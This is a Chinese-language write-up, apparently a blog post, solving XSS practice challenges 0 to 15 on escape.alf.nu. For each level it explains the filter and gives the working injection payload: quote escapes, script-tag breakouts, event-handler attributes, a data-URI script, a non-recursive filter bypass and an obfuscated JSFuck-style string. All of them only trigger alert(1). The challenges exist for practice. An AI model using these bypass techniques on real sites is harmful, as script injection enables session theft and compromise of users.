地址:http://escape.alf.nu/

level 0: 注意补全,");alert(1)//

level 1: 通过添加反斜线使用来转义的反斜线变为字符,\");alert(1)//

level 2: 双引号,反斜杠都被转义了……没想到办法,就搜了搜,原来可以直接不管双引号而闭合<script>标签,可能优先级不同吧,</script><script>alert(1)//

level 3: JSON.stringify() 方法可以将任意的 JavaScript 值序列化成 JSON 字符串。<a> 标签的href属性可执行js代码,尝试补全双引号,插入自己的js代码,直接插入会被转义,使用URLencode可绕过,%22),alert(1)(%22

level 4: 这个题需要仔细地观察正则式,注意到 " 仅仅替换了一次,<a>标签中不能有空白符比较难用,而 <img> 标签中的第二个匹配文本允许除换行符以外的任意字符,这个就比较好用了,注意闭合引号就好了,[[1|2"" onload=alert(1) "]]

level 5: 这是第4题的升级版," 全部被替换了,因此第4题的方法行不通了,对"进行编码也行不通,百思不得其解啊,无奈看了看评论,得到解答 [[1|http://onload='alert(1)']],原来是同时利用 <img> 标签跟 <a> 标签啊!看看输出的源码就会发现,成功绕过了 "

level 6: 以 # 作为分隔符输入两个参数,如果 # 前面是 Element 结果就是创建一个新的节点,具体什么节点由 # 后面指定,而如果 # 前面是 Comment,那么 # 后面就变成注释内容,闭合注释符号然后写入自己的代码即可, Comment#><script>alert(1)</script><!

level 7: 仍然是以 # 作为分隔符输入两个参数,对第一个参数做正则匹配,注意匹配的字符中包括单引号 ',这是本题的关键,使用单引号和注释符号来隔离 json 字符串中碍事的字符,就可以构造出来了,'#';alert(1)//

level 8: 使用 Data URI,插入一个 html 文档,</script><script src=data:text/html,%61%6c%65%72%74(1)>

level 9: 其中一个答案

"+[][(''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]][(''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"(1)")())//

不过没看懂,详见http://www.pwntester.com/blog/2014/01/08/escape-alf-nu-xss-challenges-write-ups-part-257/

level 10: 仔细分析代码可知,输入被js加入到<a>标签中,但是加入之前做了编码转换,但是没有对输入的\进行编码,因此我们可以利用16进制或8进制编码被过滤的符号来进行注入,其中一个答案是:\x3cimg src=# onerror=alert(1)\x3e

level 11: 在 level 2 的基础上加了将输入中的</script字符串(忽略大小写)全部替换为空串,但是并没有递归匹配,因此可以构造一个字符串使被替换后剩下的字符串仍然能拼出</script,例如:</scr</scriptipt><script>alert(1)//

level 12: 跟 level 7 类似,只不过这次过滤的是/,因此要找一种不同的方式来注释掉多余的字符,答案是:'#';alert(1)<!--

level 13: 关键是触发

tag.onload = function() {

  if (youWon) alert(1);

};

答案是name="youWon"

level 14: HTML5解析器会将<!--<script></script>之间的任何东西都当作 JS

代码处理,同时要确保代码中还有一个-->来防止解析器报语法错误,我们可以注入if(alert(1)/*<!--<script>,结果代码就变为

var url = "if(alert(1)/*<!--<script>"; // We'll use this later </script>

<!-- for debugging -->

URL: if(alert(1)/*<!--<script>

<!-- then suddenly -->

<script>

if (!/^http:.*/.test(url)) console.log("Bad url: " + url);

else new Image().src = url;

level 15: 与 level 14 类似,但是需要自己注入-->来闭合标签,答案是:<!--<script>#)/;alert(1)//-->,结果代码变为

<script>console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")</script>

<script>标签内的代码被解析为

console.log("junk_string") < /junk_regexp/ ; alert(1) // -->

其中,junk_string:<!--<script>,junk_regexp: script><script>console.log(")

"alert(1) to win" writeup的更多相关文章

  1. 【alert(1) to win】不完全攻略

    alert(1) to win 一个练习XSS的平台,地址:https://alf.nu/alert1 Warmup 给出了一段JavaScript代码 function escape(s) { re ...

  2. alert(1) to win Part Ⅰ

    alert(1) to win Adobe: function escape(s) { s = s.replace(/"/g, '\\"'); return '<script ...

  3. 【20171027中】alert(1) to win 第13,14,15,16题

    第13题 题目: function escape(s) { var tag = document.createElement('iframe'); // For this one, you get t ...

  4. 【20171027早】alert(1) to win 第9,10,11,12题

    人在江湖,不服就干! 第9题: function escape(s) { function htmlEscape(s) { return s.replace(/./g, function(x) { r ...

  5. 【20171026早】alert(1) to win - 第六、七、八题

    早上7点起床,又写了一篇小说发在了起点网上,有兴趣的可以看看.点击这里 忙完后,继续练习,刚开始发现自己答题的速度有些慢,可能是因为对于html,javascript知识不是很精通,但是话又说回来,谁 ...

  6. 【20171025晚】alert(1) to win 第五题 正则表达式过滤

    吃过晚饭,再练一题 第五题 function escape(s) { var text = s.replace(/</g, '<').replace(/"/g, '"' ...

  7. 【20171025中】alert(1) to win 脚本渲染自建

    游戏误人生,一下午玩了将近四个小时的三国杀,后悔不已,然后重新拾起xss challenge,突发奇想,自己构建渲染后的html. 从最简单的开始. 自动检测html: <!DOCTYPE ht ...

  8. 【20171025早】alert(1) to win 练习

    本人黑绝楼,自称老黑,男,25岁,曾经在BAT工作过两年,但是一直都是底层人员,整天做重复性工作,甚敢无趣,曾和工作十年之久的同事聊天,发现对方回首过往,生活是寡淡如水,只有机械性工作.旋即老黑毅然决 ...

  9. alert(1) to win部分解题

    XSS在线习题分析 (https://alf.nu/alert1) 1. Warmup function escape(s) { return '<script>console.log(& ...

随机推荐

  1. 简单的c程序分析

    1.裸函数 c语言的普通函数中即使什么都不写,编译器在编译时也会给它加上一些汇编代码:比如开栈.返回等: 裸函数就是编译器什么都不管,一切都需要自己来处理: 裸函数的优点是自由度高,可以应用在钩子程序 ...

  2. CSS的水平居中和垂直居中

    水平居中如果不太熟悉盒子模型的话属实不太好理解,其实就是控制其他属性来让border之内的内容被控制在父容器中间就行了,最经典的就是使用{margin: 0  auto}了,控制其上下外边框为0,左右 ...

  3. BZOJ 4004: [JLOI2015]装备购买 高斯消元解线性基

    BZOJ严重卡精,要加 $long$  $double$ 才能过. 题意:求权和最小的极大线性无关组. 之前那个方法解的线性基都是基于二进制拆位的,这次不行,现在要求一个适用范围更广的方法. 考虑贪心 ...

  4. 138企业邮箱pop/imap和smtp服务器地址

    如果客户端设置的是pop模式:接收邮件服务器(pop):pop.138mail.net ,端口号是110 (如果勾选了SSL,端口号则变为995)发送邮件服务器(smtp):smtp.138mail. ...

  5. matplotlib中 plt.plot() 函数中**kwargs的参数形式

    plt.plot(x, y, **kwargs) **kwargs的参数大致有如下几种: color: 颜色 linestyle: 线条样式 marker: 标记风格 markerfacecolor: ...

  6. 排序学习(learning to rank)中的ranknet pytorch简单实现

    一.理论部分 理论部分网上有许多,自己也简单的整理了一份,这几天会贴在这里,先把代码贴出,后续会优化一些写法,这里将训练数据写成dataset,dataloader样式. 排序学习所需的训练样本格式如 ...

  7. Python基础之注释

    有时候我们写的东西不一定都是给用户看的,或者不希望解释器执行,那么我们可以选择注释掉代码. 被注释的内容是不会执行的,可以方便在以后能读懂代码. 注释分为两种,一种是单行注释,一种是多行注释. 单行注 ...

  8. codeforces gym #101873B. Buildings(Polya定理)

    参考博客: https://blog.csdn.net/liangzhaoyang1/article/details/72639208 题目链接: https://codeforces.com/gym ...

  9. 使用Jmeter对观影券查询接口做性能测试

    线程数:虚拟用户数.一个虚拟用户占用一个进程或线程.设置多少虚拟用户数在这里也就是设置多少个线程数. 准备时长: 设置的虚拟用户数需要多长时间全部启动.如果线程数为20 ,准备时长为10 ,那么需要1 ...

  10. 基于 XML 的 AOP 配置(1)

    本文连接:https://www.cnblogs.com/qzhc/p/11969734.html 接下来我将用一个很简单的实例 1. 环境搭建 1.1. 第一步:准备必要的代码 业务层代码: Acc ...